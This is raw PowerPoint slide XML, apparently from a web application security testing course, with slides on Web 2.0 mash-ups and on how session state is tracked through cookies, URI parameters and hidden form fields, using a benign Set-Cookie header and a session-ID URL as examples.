          <a:xfrm>
            <a:off x="7645400" y="2524125"/>
            <a:ext cx="823913" cy="822325"/>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type="triangle" w="lg" len="med"/>
              </a14:hiddenLine>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1038" name="Straight Connector 24"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7645400" y="2792413"/>
            <a:ext cx="823913" cy="822325"/>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type="triangle" w="lg" len="med"/>
              </a14:hiddenLine>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1039" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="7581900" y="2705100"/>
            <a:ext cx="1524000" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1040" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="3200400"/>
            <a:ext cx="868363" cy="620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Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>AJAX</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t> Code</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Requested </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8258175" y="3200400"/>
            <a:ext cx="825500" cy="620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Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Maps </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Content</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Retrieved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1042" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7392988" y="2732088"/>
            <a:ext cx="820737" cy="611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Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Flickr</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Content</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Retrieved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1043" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5413375" y="5638800"/>
            <a:ext cx="835025" cy="444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Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Mash-Up</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Displayed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1044" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Increased Functionality with Web 2.0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="Tahoma" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1045" name="Oval 45"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6213475" y="2998788"/>
            <a:ext cx="822325" cy="822325"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1046" name="Oval 47"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="274638" y="709613"/>
            <a:ext cx="823912" cy="823912"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1047" name="Oval 48"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="1143000"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048" name="Oval 49"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="309563" y="687388"/>
            <a:ext cx="822325" cy="822325"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1049" name="Oval 51"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="3048000"/>
            <a:ext cx="822325" cy="822325"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1050" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7162800" y="2743200"/>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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1051" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8382000" y="2743200"/>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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1052" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943600" y="5257800"/>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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1053" name="Freeform 61"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5422900" y="2406650"/>
            <a:ext cx="2197100" cy="1712913"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2242989 w 2196691"/>
              <a:gd name="T1" fmla="*/ 1622705 h 1712791"/>
              <a:gd name="T2" fmla="*/ 805684 w 2196691"/>
              <a:gd name="T3" fmla="*/ 211448 h 1712791"/>
              <a:gd name="T4" fmla="*/ 233707 w 2196691"/>
              <a:gd name="T5" fmla="*/ 354002 h 1712791"/>
              <a:gd name="T6" fmla="*/ 2207938 w 2196691"/>
              <a:gd name="T7" fmla="*/ 1726509 h 1712791"/>
              <a:gd name="T8" fmla="*/ 2207938 w 2196691"/>
              <a:gd name="T9" fmla="*/ 1726509 h 1712791"/>
              <a:gd name="T10" fmla="*/ 2207938 w 2196691"/>
              <a:gd name="T11" fmla="*/ 1726509 h 1712791"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 60000 65536"/>
              <a:gd name="T16" fmla="*/ 0 60000 65536"/>
              <a:gd name="T17" fmla="*/ 0 60000 65536"/>
              <a:gd name="T18" fmla="*/ 0 w 2196691"/>
              <a:gd name="T19" fmla="*/ 0 h 1712791"/>
              <a:gd name="T20" fmla="*/ 2196691 w 2196691"/>
              <a:gd name="T21" fmla="*/ 1712791 h 1712791"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T12">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T15">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T16">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
              <a:cxn ang="T17">
                <a:pos x="T10" y="T11"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T18" t="T19" r="T20" b="T21"/>
            <a:pathLst>
              <a:path w="2196691" h="1712791">
                <a:moveTo>
                  <a:pt x="2196691" y="1609813"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1428255" y="862274"/>
                  <a:pt x="1117020" y="419536"/>
                  <a:pt x="789053" y="209768"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="461086" y="0"/>
                  <a:pt x="0" y="100698"/>
                  <a:pt x="228886" y="351202"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="457772" y="601706"/>
                  <a:pt x="2162369" y="1712791"/>
                  <a:pt x="2162369" y="1712791"/>
                </a:cubicBez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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1054" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5638800" y="2819400"/>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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1055" name="Picture 3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39150" y="2038350"/>
            <a:ext cx="628650"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56" name="Picture 3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6400" y="2038350"/>
            <a:ext cx="628650"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1026" name="Object 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7467600" y="3962400"/>
          <a:ext cx="609600" cy="600075"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s11354" name="Clip" r:id="rId6" imgW="2501798" imgH="2616098" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId6" imgW="2501798" imgH="2616098" progId="">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7600" y="3962400"/>
                        <a:ext cx="609600" cy="6000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Tracking </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Session data is important, but how do we track</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Typically a session token is passed to and from the client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Popular methods for tracking state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>URI Parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Hidden Form Fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>As testers, we need to evaluate these tokens</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14732126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85800" y="152400"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90115" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="381000" y="1055911"/>
            <a:ext cx="8382000" cy="4114800"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Cookies are data pieces that are sent to the browser by the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Sent as part of the HTTP Header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Browser is supposed to store them without alteration, blindly passing them back to the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Can be marked as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This tells the browser to send the cookie only via HTTPS connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Also marked with an indication for how long to store</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Could be stored for no time, making for non-persistent cookies, stored in browser memory, disappearing when browser is closed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>As part of the request, the client will send the data back</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This allows the server to identify users and/or sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>A single domain is typically limited to 50 cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Under 4KB total</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>For example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Set-Cookie: USERID=kevin; expires=Fri, 27-Feb-2021; path=/; domain=.secureideas.com</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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>URI Parameters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91139" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Data is placed in the URI of links</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Param=value format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>When a user clicks on a link, the browser sends the data in the URI back to the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It sends this data in an HTTP GET request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>For example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>http://www.secureideas.com/index.php?sessionid=124534</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>As mentioned earlier, separate parameters are separated by &amp; symbols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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Hidden Form Fields</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92163" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
